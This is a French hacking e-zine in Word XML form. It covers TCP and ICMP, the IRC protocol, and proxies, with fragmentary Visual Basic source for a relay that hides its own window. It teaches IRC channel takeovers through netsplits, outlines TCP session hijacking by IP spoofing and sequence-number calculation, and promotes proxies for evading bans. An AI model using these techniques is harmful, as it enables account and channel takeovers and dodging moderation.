        <w:tab/>
        <w:t xml:space="preserve">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****************************               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e processus permet de s'assurer que les deux connexions sont prêtes a émett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t à recevoir des données et initialisent le numéro de séquenc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l. Fermeture d'une connexion TC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s processus en présence peuvent fermer une connexion par la primitive close(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logiciel TCP envoie alors un segment où le bit FIN est positionn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Il libère un des deux canaux de communicat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logiciel receveur envoie l'accusé de reception FIN et indique à l'applica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stinatrice qu'il n'y a plus de donnée à lire eof(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a communication est alors fermée entière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>D - ICMP ( Internet Control and error Message Protocol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a. Défini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protocole Internet ( IP ;)) dispose d'un mécanisme de traitement des erreur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nommé ICMP. Les messages circulent dans la parties reservé aux donn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ans un datagramme IP, tout comme les info ordinaire :). Ils sont transmi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au logiciel Ip directement (si ça interesse kkun ;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b. L'en-tete ICM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ette entete est constitués de 3 champs qui ne bouge jamais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Champs</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
        <w:tab/>
        <w:t xml:space="preserve">   |    Longueurs   |</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Description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Type</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   |       8 Bits         | Indique le type de message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Code</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   |       8 Bits         | Information supplémentaire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</w:t>
        <w:tab/>
        <w:t>|</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   | </w:t>
        <w:tab/>
        <w:t xml:space="preserve">              |sur le type de messages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|Total de Controle   |     16 Bits         |     CheckSum de controle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ab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Le Champs Typ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N° Type</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Significa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0</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Reponse d'echo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3 </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Destination inaccessib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4</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Limitation de source (regulation du flux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5</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Changement de Rou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8</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Demande D'echo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1</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Expiration de Delai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2</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Problème de paramètre avec un datagram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3</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Demande Estampille de Temp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4</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Reponse d'estampille de Temp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5</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Demande d'informations (périmés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6</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Reponse d'informations (Périmés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7</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Demande de Mas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8</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Reponse de Mas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ab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Le Champs Co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</w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>N° Type</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Significa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0</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Réseau Inaccessib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</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Machine Inaccessib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2</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Protocole Inaccessib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3</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Port Inaccessib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4</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Fragmention requise et bit D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5</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Echec de Routage sour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6</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Réseau destination inconn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7</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Machine de destination inconn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8</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Machine source isolé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9</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Interdiction admnistrative de dialoguer avec le réseau demand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0</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Interdiction admnistrative de dialoguer avec la machine demand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1</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Réseau inaccessible pour le service demand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2</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Machine inaccessible pour le service demand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Note : Les messages ICMP qui rendrent compte d'erreurs, renvoient toujour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          les 64 premiers bits du datagramme Fautif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ab/>
        <w:tab/>
        <w:tab/>
        <w:t>Un chtti exemple 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ab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">     8   |</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> 16   | </w:t>
        <w:tab/>
        <w:t xml:space="preserve">               31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| Type(3)          | Code (0-5)         | Checksum de  |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</w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">          |</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">        | Contrôle</w:t>
        <w:tab/>
        <w:t xml:space="preserve">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|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">                Tout à Zero              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|</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> Entête internet + 64 bits du    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">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| </w:t>
        <w:tab/>
        <w:t xml:space="preserve">          datagramme fautif</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">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|</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">        .....                 </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">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>c. Messages ICM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Limitation du Débit de la sourc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orsqu'une passerelle est saturée par l'émission de datagrammes en provenance d'un certa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émeteur, elle lui envoie un message ICMP de limitation de déb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Aucun message n'indique la fin de limitation de débit. L'emetteur diminue progressiv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on débit jusqu'à ce que la passerelle cesse de lui expédier des messages de limitat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lle reprend alors progressivement son débit initial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  8   |    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     16   |</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
        <w:tab/>
        <w:t xml:space="preserve">    31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Type(4) </w:t>
        <w:tab/>
        <w:t xml:space="preserve">| Code (0)            | Checksum de  |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|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">             | Controle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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   Tout a Zero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 xml:space="preserve">        En-tete internet + 64 bits du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ab/>
        <w:t>datagramme fautif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 xml:space="preserve">             .....        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Redirec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i une passerelle s'apperçoit qu'une machine utilise une route non optimale, elle lui envoi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un message destiné a effectuer la correction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  8   |    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     16   |</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     31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Type(3) </w:t>
        <w:tab/>
        <w:t xml:space="preserve">| Code (0-5)         | Checksum de  |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|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">             | Controle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Adresse Ip de la passerelle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 xml:space="preserve">        En-tete internet + 64 bits du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ab/>
        <w:t>datagramme fautif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 xml:space="preserve">             .....        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u w:val="single"/>
        </w:rPr>
        <w:t>Délai Excess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i une passerelle détecte uen boucle de routage ou un délai excessivement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lle procèdera à la destruction du datagramme et expédiera un message qui ressemble à ça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  8   |    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     16   |</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     31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Type(5) </w:t>
        <w:tab/>
        <w:t xml:space="preserve">| Code (0-3)         | Checksum de  |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|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">             | Controle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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   Tout a Zero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 xml:space="preserve">        En-tete internet + 64 bits du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ab/>
        <w:t>datagramme fautif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 xml:space="preserve">             .....        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ab/>
        <w:tab/>
        <w:t>Problème de Paramètr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i une passerelle détecte un problème non traité par les messages précedent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omme par exemple une erreur d'en-tete, elle expédie un message du type suivant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  8   |    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     16   |</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     31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Type(4) </w:t>
        <w:tab/>
        <w:t xml:space="preserve">| Code (0)            | Checksum de  |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|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">             | Controle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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   Tout a Zero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 xml:space="preserve">        En-tete internet + 64 bits du    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</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>datagramme fautif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 xml:space="preserve">             .....                   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champs pointeur indique l'emplacement de l'octet fautif dans le datagram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ayant posé problème. La valeur de code 1 indique qu'une option obligatoi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était manquante dans le datagramme. Dans ce cas là le champs pointeur n'est pas utilis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ab/>
        <w:tab/>
        <w:t>Synchronisation des horloges et estimation du temps de Trans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s protocoles de la famille TCP/IP peuvent permettre de synchroniser les bases de temp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es différentes machines interconnectées. Le message aura alors la structure suivant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 xml:space="preserve">           8   |    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     16   |</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     31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| Type(4) </w:t>
        <w:tab/>
        <w:t xml:space="preserve">| Code (0)            | Checksum de  |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|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">             | Controle</w:t>
        <w:tab/>
        <w:t xml:space="preserve">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     Identificateur  |      Numéro de Sequence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Horodotage de l'émetteur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Horodotage de l'émetteur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|</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Horodotage de l'émetteur   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Pour les programmeurs en C/C++, j'ai aussi rajouté une liste tirée de Noway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Type Code Type en C        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">       Code en C                 </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">            Descrip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8   0    ICMP_ECHO        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">        0         </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">              Requete echo (pi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0   0    ICMP_ECHOREPLY        0                 </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">              Reponse echo (pi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3  0    ICMP_TSTAMP             0         </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">              Requete d'estampille horai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4  0    ICMP_TSTAMPREPLY 0         </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">              Reponse d'estampille horaire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7  0    ICMP_MASKREQ          0                        </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">              Requete de masque d'addres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8  0    ICMP_MASKREPLY      0              </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">              Reponse de masque d'addres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5  0    ICMP_IREQ                     0                    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
        <w:tab/>
        <w:t xml:space="preserve">              demande d'informations (obsolet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6  0    ICMP_IREQREPLY         0             </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">              reponse d'informations  (obsolet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9   0    ICMP_ROUTERADVERT                                                                  Avertissement d'un rout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0  0    ICMP_ROUTERSOLICIT                                                                  Solicitation d'un routeur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5   0    ICMP_REDIRECT           ICMP_REDIRECT_NET                          Redirection resea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5   1    ICMP_REDIRECT           ICMP_REDIRECT_HOST                       Redirection machi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5   2    ICMP_REDIRECT           ICMP_REDIRECT_TOSNET                  Redirection ToS et reseau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5   3    ICMP_REDIRECT           ICMP_REDIRECT_TOSHOST               Redirection ToS et machine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0    ICMP_UNREACH          ICMP_UNREACH_NET                           Reseau destination inaccessible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    ICMP_UNREACH          ICMP_UNREACH_HOST                        Machine destination  inaccessible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2    ICMP_UNREACH          ICMP_UNREACH_PROTOCOL             Protocole inaccessible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3    ICMP_UNREACH          ICMP_UNREACH_PORT       </w:t>
        <w:tab/>
        <w:t xml:space="preserve">               Port destination inaccessible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4    ICMP_UNREACH          ICMP_UNREACH_SRCFAIL   </w:t>
        <w:tab/>
        <w:t>Echec du routage relache(loose sour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ab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">routing)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5    ICMP_UNREACH          ICMP_UNREACH_NEEDFRAG             Fragmentation necessaire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6    ICMP_UNREACH          ICMP_UNREACH_NET_UNKNOWN  Reseau destination inconnu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7    ICMP_UNREACH          ICMP_UNREACH_HOST_UNKNOWNMachine destination inconn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8    ICMP_UNREACH          ICMP_UNREACH_ISOLATED               Machine source isolée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9    ICMP_UNREACH          ICMP_UNREACH_NET_PROHIB          Reseau destination administrativ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             interdit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0   ICMP_UNREACH          ICMP_UNREACH_HOST_PROHIB      Machine destination </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">               administrativement interdi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1   ICMP_UNREACH          ICMP_UNREACH_TOSNET                  ToS inaccessible sur ce resea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2   ICMP_UNREACH          ICMP_UNREACH_TOSHOST               ToS inaccessible sur cette machine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3   ICMP_UNREACH          13               </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">               Communication administrativement </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">interdite par filtrage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4   ICMP_UNREACH          14                        </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">               Violation de la precedence de la </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">               machi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3   15   ICMP_UNREACH          15    </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">               Coupure de la precedence pendant le </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>trans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1  0    ICMP_TIMXCEED         ICMP_TIMXCEED_INTRANS              TTL a 0 pendant le transit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1  1    ICMP_TIMXCEED         ICMP_TIMXCEED_REASS                   TTL a 0 pendant le reassemblag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2  0    ICMP_PARAMPROB    0                       </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">               Erreur dans le header IP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12  1    ICMP_PARAMPROB    ICMP_PARAMPROB_OPTABSENT   Option requise manquan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4   0    ICMP_SRCQUENCH      0        </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">               Demande de diminution du déb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t>By KoP et Nos-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2 - IRC, les échanges de données et comment devenir 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s servers IRC utilisent le protocole TCP avec un système assez sécuris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a seule faille dans IRC(internet relay chat) est le split qui permet notamment de faire des Take-over(prise de channels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ceux qui ne connaissent par le système d'IRC: IRC est un système de discussion qui permet de parl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à plusieurs sur des channels ou à 2 en privée. Les channels sont administrés par les opérateurs qui ont un @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devant leur nick. Ils peuvent kicker(faire quitter du channel), banner(interdire l'accès au channel),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oper (faire un simple user opérateur), déoper (faire un opérateur simple user), changer les modes du channel,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topic(titre du channel), voicer(donner la parole à des personnes si le channel est en modéra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seul les opérateurs et les voicé peuvent parler)),...Vous pouvez quitter des channels, joindre un channel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 vous y êtes authorisé(channel non plein, non en invite only, clé correcte(s'il faut en fournir une)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n'êtes pas banné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changer les modes du channel ou encore changer l'attribut d'un user, votre client(programme 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utilisez pour vous connecter à un server IRC) doit envoyer des datas spécifiqu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joindre un channel, votre client envoi la data: "JOIN :" + channel     ex: "JOIN :#HackerStorm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rver renvoye à toutes les personnes qui sont sur le channel ainsi qu'à celui qui veut le quitter la Data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":" + ident + " JOIN :" + channel     ex: ":hacker!storm@127.0.0.1 JOIN :#HackerStorm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ableau des différentes commandes envoyées par le client et par le serve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Action                           -                        Client                               -Le server renvoye(C=channel,U=user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Joindre un channel               -                "JOIN :"+channel                   -        ":"+ident+" JOIN :"+channel   (C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Quitter un channel                -                "PART :"+channel                 -       ":"+ident+" PART :"+channel (C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Changer de nick                  -           "NICK :"+nouveau nick             -    ":"+ident+" NICK :"+new nick    (C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-                                                                  -    Ou si votre le nick est déjà utilisé :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-                                                                  -          ":"+msg d'erreur de nick(U)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Kicker une personne            -       "KICK "+channel+" :"+nick          -    ":"+ident+" KICK "+channel+" :"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-                                                                  -                           +nick                     (C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Changer un mode sur un channel   -    "MODE "+channel+" "+mode+" "  -   ":"+ident+" MODE "+channel+" "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-      +divers(en fonction du mode)        -                +mode+" "+divers            (C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Changer le topic                    -       "TOPIC "+channel+" "+topic       -   ":"+ident+" TOPIC "+channel+" "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-                                                                  -                   +nouveau topic              (C)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Test si le client est toujours online  -            "PING :"+server ou nick           -           "PONG :"+server ou nick     (U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Est envoyé par le server si le client  -            "PONG :"+server ou nick         -           "PING :"+server ou nick       (U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n'envoi pas de données durant        -                                                                 -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un temps défini. Les autres clients   -              Ping est la requète                   -            Et pong est la réponse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peuvent aussi faire un CTCP ping   -                                                                 -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Parler sur un channel ou en query   -  "PRIVMSG "+channel ou nick+ " :" -":"+ident+" PRIVMSG "+chan/nick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-                    +message texte                  -+ " :"+message    (U(nick),C(channel))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y a d'autres commandes comme celle-ci qui existent mais qui sont moins utilisées ou moi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mportantes pour le bon fonctionnement du server(comme WHOIS,...). Certains servers o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urs propre commandes. Les commandes doivent dabord être reconnu par le server et u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fois reconnu, elles sont renvoyé vers toutes les personnes d'un channel ou un user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en fonction du type de commande) avec (pour un soucis d'identification) ":"+ident+" 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vant la même commande (sauf pour le PING - PONG). Après connaitre les données échang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tre le client et le server, il faut comprendre comment le server gère tous les utilisateurs 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recherche une éventuelle err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ci un schéma qui montre les différentes étapes que fait le server dès la connection d'un client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"User " + nom + " \""+ident(IP ou DNS)+"\" \"" +le nom de l'host(nom du server)+ "\" :"+mail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"NICK " + nick                                                                  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Il test si vous avez plus de 3 connections avec cette IP ou DNS.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i oui, il vous déconnecte avec un message d'erreur.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Il créé ensuite deux variable texte avec les données fournies et vos données de connections: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1-Votre ident IRC -&gt; nick+"!"+nom+"@"+ident(si non valide,il prend votre IP ou votre mask)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2-Votre mail pour les whois -&gt; mail                              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Deux variables listes associées à votre ident IRC sont aussi créées :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1-La liste des channels ou vous êtes(ex: liste[1]="HackerStorm", liste[2]="France",..)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2-Les modes que vous avez sur les différents channels(User=0,Voice=1,Op=2,Op+Voice=3,..)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Ces deux listes sont mise à 0 lors de votre connection.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                                                                                            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Il vous envoye les informations du server(infos pour vous-&gt;les admins,nouveautées,...)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Il fait une boucle qui attend vos commandes.             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i vous joignez un chanel ou il n'y a personne, vous devez opérateur du channel.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i vous restez inactif pendant un moment prévu par l'admin du server,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il vous envoye un PING. Si vous ne répondez pas,   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il fait un ping timeout et vous déconnecte.                                                                                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rver passe à l'étape suivante que si celle qu'il vient de faire est valid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non il retourne un message d'erreur et reste en attente d'infos ou vous déconnec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j'espère que vous avez compris se qu'il se passe au niveau des transferts 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s identifications clients/servers. Je vais maintenant vous expliquer se qu'il se pas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u niveau des servers/server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ci un schéma exemple illustrant les connections servers/server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ous-server -    - Sous-server -</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Sous-servers secondair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\</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        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---------------</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">     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Sous-server -</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">         - Sous-server -</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Sous-servers primair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---------------</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">     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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">             </w:t>
        <w:tab/>
        <w:t xml:space="preserve">             </w:t>
        <w:tab/>
        <w:t xml:space="preserve">             </w:t>
        <w:tab/>
        <w:t xml:space="preserve">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------------            ------------            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- Server - &lt;----&gt; - Server - &lt;----&gt; - Server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------------            ------------            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\                         / |\                          / |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     \                /     |     \                 /     |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          \       /         |          \        /         |             </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Servers principaux interconnecté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             /\             |              /\             |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        /          \        |         /           \       |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    /                   \   |    /                     \  |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------------            ------------            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- Server - &lt;----&gt; - Server - &lt;----&gt; - Server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------------            ------------            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|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">             </w:t>
        <w:tab/>
        <w:t xml:space="preserve">             </w:t>
        <w:tab/>
        <w:t xml:space="preserve">             </w:t>
        <w:tab/>
        <w:t xml:space="preserve">       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---------------</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">     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Sous-server -</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">         - Sous-server -</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Sous-servers primair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---------------</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">     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          /               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--------------------           --------------------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- Sous-server - &lt;----&gt; - Sous-server -    - Sous-server -</w:t>
        <w:tab/>
        <w:t>Sous-servers secondair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--------------------           --------------------    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pouvez voir dans ce schéma, qu'il y a une hyèrarchie dans les server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 un servers ou un sous-server déconnecte, tous ses sous-servers déconnec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ussi de leur server parent. Le même principe s'opère pour les servers principau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auf que eux déconnectent du réseau principale. C'est ce que nous appellons un spl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urant un split, seul les personnes étant sur le server qui split ou un de s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us-servers sont visibles dans la liste des users connectés. De nombreus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personnes utilisent ce moyen pour prendre l'op sur des channels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'est ce que nous appellons des Take-Over(prise de pouvoir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près ces explications, il vous est facile de comprendre comment. Prenons un exemp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voulez TO(abréviation de Take-Over) #channel. Tous les users qui sont s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 channel sont sur des servers différents du votre(sur une branche différente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attendez que votre server ou un de ses servers parent split pour que vo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yez seul sur #channel. Dès que vous êtes seul, vous quittez #channel et revenez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êtes donc OP. Lorsque le server qui a splité se reconnecte, vous serez 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ur le channel car le server vous OP. Mais attention, sur les gros servers, il y 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e variable liste dans laquelle sont mis les channels qui sont temporair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on libre("Channel "+channel+" temporary unavailable") qui permet une meill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otection contre les TO. En effet, lorsque des users quittent un channel à cau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'un server qui split, le nom du channel est automatiquement ajouté à cette lis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orsque le dernier user quitte le channel, plus personne ne peut le joindr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rver vous envoi le message "Channel #channel temporary unavailable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devrez attendre la fin du split pour pouvoir retourner sur le channel.</w:t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tte technique est très connue et il n'y a pas besoin d'avoir de gross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nnaissances en piratage pour la fair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ous allons maintenant étudier comment toutes ces sécurités peuvent êt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ntournées par un moyen très simple. Vous savez que le server regar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'IP source de l'user qui exécute la commande. Lorsque la synthaxe de l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mmande est correcte et que l'user qui a l' IP source a les droits approprié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exécuter cette commande, le server exécute la command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ul moyen est donc de changer son IP sourc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ci peut se faire avec n'importe quel OS dans lequel l'entête des paqu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'est pas bloqué (ex: aucun accès entête avec winsock mais vous avez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'accès à l'entête des paquets sous Linux grâce à la programmation RAW socket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ul problème est que les servers IRC fonctionnent en TCP et que donc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devez vous procurer les clés ISN et ACK pour que le server vo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uthentifie comme étant la personne qui devrait être l'auteur de ce paque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cela vous pouvez soit sniffer la vrai personne, la bloquer , calcul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s nouvelle clés et les renvoyer(Hunt ou Circ font toute la manip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it envoyer des paquets qui ont une clé ISN et ACK calculé et incrément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à chaque packet.</w:t>
        <w:tab/>
        <w:t>Vous devez mettre comme data la fonction que vo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lez faire exécuter par la personn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je pense que ce cours sur IRC est assez comple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 toutefois vous avez des questions, n'hésitez pas -&gt; HackerStorm@HotMail.Com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3 - PROXY et GAT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     A - Comment cela fonctionne et à quoi cela me sert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 proxy comme une gate est un server qui permet de dissimuler son I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à tous les autres servers tout en pouvant recevoir les réponses ou les data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 ces autres servers. En effet, en utilisant le RAW socket(définition complète du packet envoyé)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ous n'aurions pas besoin de proxy ou de gate pour dissimuler notre IP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ul problème, est que nous ne recevrions pas les réponses ni les data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s autres servers car ils les enverraient à la fausse IP sourc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proxy comme la gate est, en fait, une sorte de relais qui vous perm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'envoyer et de recevoir des données sans que le server destinatai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enne connaissance de votre IP. Les proxys et les gates fonctionn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milairement. Tout se que je dirais sur le proxy pourra aussi être dit pour les gat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chéma d'une connexion sans proxy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Votre PC  &lt;--------&gt;  Ser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P local:        213.214.215.216         210.035.036.03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P distante:  210.035.036.037         213.214.215.216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ce cas le client et le server sont connecté par connexion direc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rver connait l'IP de votre PC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chéma d'une connexion avec proxy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Votre PC  &lt;--------&gt;  Proxy   &lt;--------&gt;  Ser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P local:        213.214.215.216      212.030.040.050    210.035.036.03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P distante:  210.035.036.037      213.214.215.216    212.030.040.05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     210.035.036.03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ce cas le client et le server sont connecté au proxy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rver pense que votre IP est celle du proxy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ape de connection à un server par un proxy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envoye des informations au proxy au format text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* Nom du server ou IP du ser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* Port de connexion sur le ser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Le proxy prend votre IP et le port de connexion qui sont indiqu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dans le paquet que vous lui avez envoyé pour vous connect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le proxy se connecte sur le server. Le server prend l'IP et le por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de connexion du proxy dans le paquet que le proxy lui a envoy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pour se connect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i le proxy n'arrive pas à se connecter sur le server, il vous déconnec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i le proxy est connecté au server, il vous renvoye les datas envoy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par le server et envoi au server les datas que vous lui envoyez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 principe utilise donc 2 connexions. C'est grâce à ceci qu'il sera pl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ifficile au server de vous retrac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emple sous un server IRC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vous connectez à ircnet.grolier.net sur le port 6667 en connexion direc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 quelqu'un fait un whois sur vous, il vera votre vrai ident ou votre vrai IP comm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KoP!hacker@ppp-08-n04-libertysurf.fr  ou encore  KoP!hacker@213.036.056.076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ors d'un ban par ident ou IP, vous n'aurez plus accès au channel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 vous utilisez le proxy proxy.free.net, votre ident sera : KoP!hacker@proxy.free.n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donc si quelqu'un vous ban, vous aurez qu'à prendre un autre proxy ou prend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tre vrai ident pour ne plus être bann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     B - Exemple de proxy en Visual-Basi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ab/>
        <w:tab/>
        <w:t>Proxy en Visual-Basic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réez un nouveau projet EXE standard. Faites CTRL + T et ajoutez "Microsoft Winsock Control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réez 3 objets winsock. Nommez les "winsock", "winsock1"et "winsock2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réez une listbox et nommez la "list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ettez ensuite la source qui suis dans la source du proje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im etape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im vip, ip, por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Form_Load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cachons la boite form du program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Form1.Visible = Fa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Listen sur le port 10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LocalPort = 10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Mise à 0 de la variable etap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tap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_Close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la connection se ferme nous re-Listenons sur le port 1080 et nous remettons etape à 0 et Connect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LocalPort = 10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tap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Connect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_ConnectionRequest(ByVal requestID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quelqu'un essaye de se connecter sur le port en listen(108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l'acceptons et mettons les variables etape et Connect à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Accept requestI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Connect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tap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lisons les données texte envoy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Etape 0 -&gt; définition du pass : si le mot de pass est saisi et est correcte alors nous passons à l'étape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etape = 0 And Left$(dat, Len(dat) - 2) = "Proxy by KOP for HackerStorm" Then etape = 1: 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Etape 1 -&gt; définition du server vers lequel les données doivent être re-routé(etape=2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etape = 1 Then ip = dat: etape = 2: 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Etape 2 -&gt; définition du port du server vers lequel les données doivent être re-routé(etape=3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etape = 2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port =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tape = 3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listenons winsock2 et envoyons au server un de nos ports ouvert sur lequel il doit se connect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pour utiliser le proxy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insock2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insock2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MsgBox "Vous devez vous connecter sur " + Str(Winsock2.LocalPor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insock.SendData "Connectez vous sur le port " + Str(Winsock2.LocalPort) + Chr(13) + Chr(1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mettons son IP dans la variable VIP pour la vérification d'authenticité de reconnection sur le bon por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vip = Winsock.RemoteHostI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re-Listenons sur le port 10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insock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insock.LocalPort = 10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insock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_Error(ByVal Number As Integer, Description As String, ByVal Scode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Source As String, ByVal HelpFile As String, ByVal HelpContext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 xml:space="preserve"> CancelDisplay As Boolea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une erreur intervient dans winsock,  nous fermons la connection et on re-listen sur le port 1080(etape=0;Connect=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LocalPort = 10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tap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Connect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1_Connect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Si le server que vous avez configuré se connect, les données envoyé par votre client penda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le temps dez la connection sont renvoyé au server dans le même ord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For i = 0 To List.ListCount -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SendData List.List(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List.RemoveItem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ext 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on met 1 dans la variable connec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Connect =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1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le server envoye des données, nous les lisons et les renvoyons vers le cli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2.Send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2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le client envoye des données, nous les lisons et si le server est connecté, nous les renvoyons vers le ser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sinon nous les ajoutons à la liste qui sera envoyée plus tar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2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Connect = 1 Then Winsock1.Send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Connect = 0 Then List.AddItem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2_ConnectionRequest(ByVal requestID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effaçons la liste de données envoyées par le cli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For i = 0 To List.ListCount -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List.RemoveItem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ext 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quelqu'un essaye de se connecter sur le port en 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nous l'acceptons si son IP est identique a celle enregistré 